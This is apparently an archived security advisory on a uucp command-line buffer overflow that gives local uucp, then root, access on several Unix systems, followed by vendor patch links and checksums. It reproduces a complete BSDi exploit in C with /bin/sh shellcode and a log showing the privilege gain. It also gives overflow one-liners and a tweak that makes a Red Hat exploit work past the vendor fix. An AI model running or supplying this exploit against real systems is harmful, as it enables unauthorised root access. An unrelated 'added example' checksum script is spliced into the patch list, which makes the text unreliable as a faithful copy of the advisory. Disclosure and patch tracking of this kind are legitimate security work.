14th Jan 2003 [SBWID-4739]
COMMAND
uucp bad argument handling leads to local root exploit
SYSTEMS AFFECTED
OpenLinux 2.3
OpenLinux eServer 2.3.1
OpenLinux eDesktop 2.4
BSDI BSD/OS 4.0.1
BSDI BSD/OS 3.0
SunOS 5.8
PROBLEM
Zen Parse found the following, as published in Caldera advisory
CSSA-2001-033.0.
There is an argument handling problem which allows a local attacker to gain
access to the uucp group. Using this access the attacker could use badly
written scripts to gain access to the root account.
Update
======
izik @ http://www.tty64.org added :
buffer overflow is based on command line argv. for ex:
/usr/bin/uucp `perl -e 'print "A" x 900'` `perl -e 'print "A" x 900'`
`perl -e 'print "A" x 356'`
Update 2
=========
zen-parse produced following exploit for RedHat:
Vade 79 posted exploit for BSDi/4.0 :
-- usage start --
bash-2.02$ id
uid=123(t) gid=100(user) groups=100(user)
bash-2.02$ cc bsdi_uucp.c -o bsdi_uucp
bash-2.02$ ./bsdi_uucp -uuparams
[ (BSDi/4.0)uucp*[]: family buffer overflow, by:
v9@fakehalo.deadpig.org. ]
*** [data]: return address: 0x80474, program:
/usr/sbin/uuparams.
$ id
uid=123(t) euid=6(uucp) gid=100(user) egid=6(uucp)
groups=6(uucp), 100(user)
$
-- usage end --
-- bsdi_uucp.c start --
/* (BSDi)uucp[] family buffer overflow. by:
v9@fakehalo.deadpig.org. this yields
euid/egid/group=6(uucp) on BSDi/4.0
systems. (BSDi specific exploit)
*/
#define UUCP "/usr/bin/uucp"
#define UUPARAMS "/usr/sbin/uuparams"
#define UUNAME "/usr/bin/uuname"
#define FILLER "x"
static char exec[]=
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46"
"\xfa\x89\x46\x0c\x89\x76\x08\x50\x8d\x5e"
"\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff"
"\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x00"; /* 46 chars. */
void usage(char *progname){
printf("*** [syntax]: %s <-uucp|-uuparams|"
"-uuname>\n",progname);
exit(1);
}
long pointer(void){__asm__("movl %esp,%eax");}
int main(int ac,char **av){
unsigned short type=0;
unsigned int i=0;
long ret;
char eip[1024],buf[4096];
char *progptr;
printf("[ (BSDi/4.0)uucp*[]: family buffer o"
"verflow, by: v9@fakehalo.deadpig.org. ]\n");
if(ac>1){
if(!strncasecmp(av[1],"-uucp",5)){
progptr=UUCP;
type=1;
}
else if(!strncasecmp(av[1],"-uuparams",9)){
progptr=UUPARAMS;
type=0;
}
else if(!strncasecmp(av[1],"-uuname",7)){
progptr=UUNAME;
type=0;
}
else
usage(av[0]);
}
else
usage(av[0]);
ret=(pointer()+sizeof(buf));
eip[0]=0x01;eip[1]=0x01;eip[2]=0x01;
for(i=3;i<1024;i+=4){*(long *)&eip[i]=ret;}
eip[i]=0x0;for(i=0;i<(sizeof(buf)-
strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
memcpy(buf+i,exec,strlen(exec));
memcpy(buf,"EXEC=",5);putenv(buf);
printf("*** [data]: return address: 0x%lx, p"
"rogram: %s.\n",ret,progptr);
if(execl(progptr,progptr,FILLER,
(type?FILLER:eip),(type?eip:0),0)){
printf("*** [error]: could not execute %s s"
"uccessfully.\n",progptr);
exit(1);
}
exit(0);
}
-- bsdi_uucp.c end --
Update (18th January 2002)
=======
Zen-Parse says about RedHat patch :
The patch does prevent the original exploit from working.
However, a trivial patch to the exploit I posted makes it work again.
local user -> uucp (via this problem) -> root (on some distributions,
via /usr/sbin/makewhatis: '${PATH:0:1} (or similar) + redirection
characters' issue.)
$ cd redhat7.0-uucp-to-root
$ sed s/--config/--confi/ < exp-erm.sh >tmp-exp-erm.sh
$ mv tmp-exp-erm.sh exp-erm.sh
$ ./runme
and wait for /tmp/rootshell to appear.
Update (21 January 2002)
======
Exploit on Debian PowerPC unstable, by Charles Stevenson :
Update (14 January 2003)
======
hipnosis [hipnosis@softhome.net] reported for SunOS :
The buffer overflows when the app uucp is executed with the parameter -s
followed by a string bigger than 7525 bytes.
hipnosis% uucp -s `perl -e 'print "A"x7526'`
Segmentation Fault
hipnosis% uucp -s `perl -e 'print "A"x7525'`
hipnosis%
SOLUTION
Workaround none
The proper solution is to upgrade to the latest packages.
Mandrake location of fixed packages
http://www.linux-mandrake.com/en/ftp.php3.
OpenLinux 2.3, Location of Fixed Packages
The upgrade packages can be found on Caldera's FTP site at: ftp://ftp.caldera.com/pub/updates/OpenLinux/2.3/current/RPMS
The corresponding source code package can be found at: ftp://ftp.caldera.com/pub/updates/OpenLinux/2.3/current/SRPMS
Verification
dd0f6e46374d62c349bf7a1f618a23a0 RPMS/uucp-1.06.2-8OL.i386.rpm
33b96ff362a261b87f73b2377fa20a5d RPMS/uucp-doc-1.06.2-8OL.i386.rpm
e602cfba314e2519e2762bfecac9024c SRPMS/uucp-1.06.2-8OL.src.rpm
Installing Fixed Packages
Upgrade the affected packages with the following commands:
rpm -Fvh uucp-1.06.2-8OL.i386.rpm \
uucp-doc-1.06.2-8OL.i386.rpm
OpenLinux eServer 2.3.1 and OpenLinux eBuilder for ECential 3.0
Location of Fixed Packages
The upgrade packages can be found on Caldera's FTP site at:
ftp://ftp.caldera.com/pub/updates/eServer/2.3/current/RPMS
The corresponding source code package can be found at:
ftp://ftp.caldera.com/pub/updates/eServer/2.3/current/SRPMS
Verification
ee5c7f9bf1887d3c34f8c232b70a84b7 RPMS/uucp-1.06.2-8OL.i386.rpm
26f7f712e318c63a5deea1474a58e06f RPMS/uucp-doc-1.06.2-8OL.i386.rpm
e602cfba314e2519e2762bfecac9024c SRPMS/uucp-1.06.2-8OL.src.rpm
Installing Fixed Packages
Upgrade the affected packages with the following commands:
rpm -Fvh uucp-1.06.2-8OL.i386.rpm \
uucp-doc-1.06.2-8OL.i386.rpm
OpenLinux eDesktop 2.4
Location of Fixed Packages
The upgrade packages can be found on Caldera's FTP site at:
ftp://ftp.caldera.com/pub/updates/eDesktop/2.4/current/RPMS
The corresponding source code package can be found at:
ftp://ftp.caldera.com/pub/updates/eDesktop/2.4/current/SRPMS
Verification
1f00b87ce48e72d8a4bd754123d554d4 RPMS/uucp-1.06.2-8OL.i386.rpm
c00296b93945c8778c46252e975818d2 RPMS/uucp-doc-1.06.2-8OL.i386.rpm
e602cfba314e2519e2762bfecac9024c SRPMS/uucp-1.06.2-8OL.src.rpm
Installing Fixed Packages
Upgrade the affected packages with the following commands:
rpm -Fvh uucp-1.06.2-8OL.i386.rpm \
uucp-doc-1.06.2-8OL.i386.rpm
OpenLinux 3.1 Server
Location of Fixed Packages
The upgrade packages can be found on Caldera's FTP site at:
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS
The corresponding source code package can be found at:
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS
Verification
4e3b47bc507d48bf9396e70c806d9a8e RPMS/uucp-1.06.2-8.i386.rpm
41cabb92a4eb86310d01c6a6b2f7453b RPMS/uucp-doc-html-1.06.2-8.i386.rpm
d06d2cd63b739895ebf82fa361266f16 RPMS/uucp-doc-ps-1.06.2-8.i386.rpm
6f3e6037bd3839380f9a4104e55a9a73 SRPMS/uucp-1.06.2-8.src.rpm
Installing Fixed Packages
Upgrade the affected packages with the following commands:
rpm -Fvh uucp-1.06.2-8.i386.rpm \
uucp-doc-html-1.06.2-8.i386.rpm \
uucp-doc-ps-1.06.2-8.i386.rpm
OpenLinux 3.1 Workstation
Location of Fixed Packages
The upgrade packages can be found on Caldera's FTP site at:
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS
The corresponding source code package can be found at:
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/SRPMS
Verification
4e3b47bc507d48bf9396e70c806d9a8e RPMS/uucp-1.06.2-8.i386.rpm
41cabb92a4eb86310d01c6a6b2f7453b RPMS/uucp-doc-html-1.06.2-8.i386.rpm
d06d2cd63b739895ebf82fa361266f16 RPMS/uucp-doc-ps-1.06.2-8.i386.rpm
6f3e6037bd3839380f9a4104e55a9a73 SRPMS/uucp-1.06.2-8.src.rpm
Installing Fixed Packages
Upgrade the affected packages with the following commands:
rpm -Fvh uucp-1.06.2-8.i386.rpm \
uucp-doc-html-1.06.2-8.i386.rpm \
uucp-doc-ps-1.06.2-8.i386.rpm
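An added example (not part of the advisory or of Caldera's tooling): a shell helper that checks downloaded packages against the Verification lines of one product section and runs the install command only if every listed file matches. The function names verify_manifest and verify_then and the manifest file uucp.md5 are assumptions; note that the same file name, uucp-1.06.2-8OL.i386.rpm, carries a different checksum in the OpenLinux 2.3, eServer 2.3.1 and eDesktop 2.4 sections, so the manifest must come from the section that matches the system.

```sh
#!/bin/sh
# Added example. Manifest lines use the advisory's Verification layout:
#   <32-hex md5>  <RPMS|SRPMS>/<package file>
# Assumes GNU coreutils md5sum is installed.

# verify_manifest DIR MANIFEST
# Checks every package the manifest lists against the copy in DIR and
# prints one status line per entry. Returns 0 only if all entries match.
verify_manifest() {
    dir=$1 manifest=$2 rc=0 n=0
    [ -r "$manifest" ] || { echo "cannot read $manifest" >&2; return 1; }
    while read -r want path || [ -n "$want" ]; do
        [ -n "$want" ] || continue              # skip blank lines
        n=$((n + 1))
        name=${path##*/}                        # drop the RPMS/ or SRPMS/ prefix
        valid=yes
        case $want in *[!0-9a-f]*) valid=no ;; esac
        [ "${#want}" -eq 32 ] && [ -n "$name" ] || valid=no
        if [ "$valid" = no ]; then
            echo "BADLINE  $want $path"; rc=1
        elif [ ! -f "$dir/$name" ]; then
            echo "MISSING  $name"; rc=1
        elif [ "$(md5sum < "$dir/$name" | cut -d' ' -f1)" = "$want" ]; then
            echo "OK       $name"
        else
            echo "MISMATCH $name"; rc=1
        fi
    done < "$manifest"
    [ "$n" -gt 0 ] || rc=1                      # an empty manifest verifies nothing
    return "$rc"
}

# verify_then DIR MANIFEST CMD [ARGS...]
# Runs CMD (the advisory's rpm -Fvh line, for instance) only when every
# manifest entry verified; otherwise nothing is installed.
verify_then() {
    if verify_manifest "$1" "$2"; then
        shift 2
        "$@"
    else
        echo "verification failed, not running: $3" >&2
        return 1
    fi
}

# Typical call for OpenLinux 2.3, with the two binary-package lines of that
# section saved as uucp.md5 next to the downloaded files:
#   verify_then . uucp.md5 rpm -Fvh uucp-1.06.2-8OL.i386.rpm \
#       uucp-doc-1.06.2-8OL.i386.rpm
```

MD5 catches a corrupted download or a package taken from the wrong product tree, but it is not collision-resistant, so the checksums are only as trustworthy as the channel the advisory itself arrived over.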
Conectiva linux
ftp://atualizacoes.conectiva.com.br/4.0/i386/uucp-1.06.1-21U40_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/uucp-1.06.1-21U40_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/uucp-1.06.1-21U40_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/uucp-1.06.1-21U41_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/uucp-1.06.1-21U41_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/uucp-1.06.1-21U41_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/uucp-1.06.1-21U42_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/uucp-1.06.1-21U42_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/uucp-1.06.1-22U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/uucp-1.06.1-22U50_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/uucp-1.06.1-23U51_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/uucp-1.06.1-23U51_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/i386/uucp-1.06.2-4U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/uucp-1.06.2-4U60_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/i386/uucp-1.06.2-6U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/i386/uucp-cu-1.06.2-6U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/i386/uucp-doc-1.06.2-6U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/uucp-1.06.2-6U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/uucp-1.06.1-22U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/uucp-1.06.1-22U50_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/uucp-1.06.1-22U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/uucp-1.06.1-22U50_1cl.src.rpm
Update (21 January 2002)
======
RedHat posted a fix for the --config exploit :
Red Hat Linux 6.2:
SRPMS:
ftp://updates.redhat.com/6.2/en/os/SRPMS/uucp-1.06.1-31.6x.src.rpm
alpha: ftp://updates.redhat.com/6.2/en/os/alpha/uucp-1.06.1-31.6x.alpha.rpm
i386: ftp://updates.redhat.com/6.2/en/os/i386/uucp-1.06.1-31.6x.i386.rpm
sparc: ftp://updates.redhat.com/6.2/en/os/sparc/uucp-1.06.1-31.6x.sparc.rpm
Red Hat Linux 7.0:
SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/uucp-1.06.1-31.7.1.src.rpm
alpha: ftp://updates.redhat.com/7.0/en/os/alpha/uucp-1.06.1-31.7.1.alpha.rpm
i386: ftp://updates.redhat.com/7.0/en/os/i386/uucp-1.06.1-31.7.1.i386.rpm
Red Hat Linux 7.1:
SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/uucp-1.06.1-31.7.1.src.rpm
alpha: ftp://updates.redhat.com/7.1/en/os/alpha/uucp-1.06.1-31.7.1.alpha.rpm
i386: ftp://updates.redhat.com/7.1/en/os/i386/uucp-1.06.1-31.7.1.i386.rpm
ia64: ftp://updates.redhat.com/7.1/en/os/ia64/uucp-1.06.1-31.7.1.ia64.rpm
Red Hat Linux 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/uucp-1.06.1-32.src.rpm
i386: ftp://updates.redhat.com/7.2/en/os/i386/uucp-1.06.1-32.i386.rpm
ia64: ftp://updates.redhat.com/7.2/en/os/ia64/uucp-1.06.1-32.ia64.rpm